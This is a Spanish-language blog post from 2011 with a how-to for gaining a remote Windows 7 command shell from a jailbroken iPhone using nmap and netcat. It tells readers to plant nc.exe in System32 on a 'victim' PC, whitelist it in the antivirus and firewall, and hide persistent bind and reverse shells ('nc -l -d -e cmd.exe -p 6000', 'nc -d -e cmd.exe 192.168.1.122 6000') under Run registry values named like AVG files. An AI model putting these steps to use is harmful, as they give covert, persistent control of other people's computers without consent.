miércoles, 27 de abril de 2011

Obtener Shell de Windows 7 Mediante Iphone/Ipod Touch

Hace pocos dias me di a la tarea de buscar dentro de las repos mas famosas y disponibles obviamente hablo de algo que muchos quizá ya conozcan y que otros alomejor no, hablo de NMAP, SSH y porsupuesto NETCAT, estas 3 herramientas de Networking quizá algo avanzadas. estas nos dan a la posibilidad de obtener una shell (solicitada) mediante unos simples comandos (aquí mencionados anteriormente) y obviamente conectados a la misma red de la PC de la cual queremos "TOMAR EL CONTROL".

Les dejo los pasos.
1.- Lo primero es tener Cydiado nuestro iPhone/Ipod Touch (No se si con IPAD funcione... lets go! try it!)
2.- Agregar en Cydia las siguientes Repos... (son las que yo utilizo) http://apt.ripdev.com, http://cydia.hackulo.us , http://iphone.org.hk/apt  y http://apt.saurik.com .

3.- Una vez agregadas las repos, buscaremos por separado, OpenSSH el cual nos permite tener conexiones seguras dentro de entornos de redes LAN y WAN.

4.-Nmap es quien nos hará mapeos de la red, es decir, dará una pasada a todas las direcciones de la red a la cual estemos conectados... en busca de información importante para nosotros.

5.- Netcat , esta mini aplicacion... que dificilmente puedo describirla, así que utilizaré la descripcion del creador.. como "A simple Socket manipulation tool" ñ___ñ yeah!

3.- Echo esto, lo siguiente es instalar NETCAT en la maquina de la victima (facil y rapido). Les dejo los enlaces

No se les olvide agregarlo a las excepciones de los antivirus ya que lo detectan como amenaza sumamente grave.

La ruta de su instalación es HDD\Windows\System32 y lo pegan ahí. Solo el nc.exe es decir la ruta quedaria de la siguiente manera HDD\Windows\System32\nc.exe y listo. Pero esperen... que nos falta.

Claro que la victima se ponga a la escucha al momento de iniciar su sesión en windows y lo haremos de esta manera.
Tenemos que ir hasta esta ruta dentro de la pc de la victima despues de haber instalado nc.exe
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/CurrentVersion/Windows/Run". Y creamos 2 valores de cadena... uno llamado avg23.exe con valor "nc -l -d -e cmd.exe -p 6000" sin las comillas y el otro seria runWin.exe con valor nc -d -e cmd.exe 192.168.1.122 6000, notese la diferencia de que el primero apunta a cualquier dirección dentro de la red. y el segundo apunta a una direccion en especifico.. osease la nuestra.

Teniendo todo esto ya en nuestras manos utilizamos los siguientes comandos en nuestro iPhone/Ipod Touch
"nc 192.168.1.XX 6000" las xx representan el ultimo digito de la direccion ip de la victima, la cual obtendriamos con NMAP y obvio el puerto seria el 6000, ya que por este puerto se establecerá la comunicación entre los 2 dispositivos.

Importante: Al momento de usar netcat es muy probable que salte nuestro firewall, agreguen la excepción para asi evitar canas innecesarias.

Al final quedaria algo mas o menos así.


Shell obtenida desde iPhone/iPod touch mediante netcat,nmap,ssh. on Twitpic

Espero les sirva esta info... ya un buen sin postear no? Al fin vacaciones ñ____ñ

Bytes.

1 comentarios:

Publicar un comentario

Proyectos Documentados, Trabajos, Ideas...

Donar

Noize Nación Radio

Click para escuchar

Compartir

Twitter Delicious Facebook Digg Stumbleupon Favorites More

Social...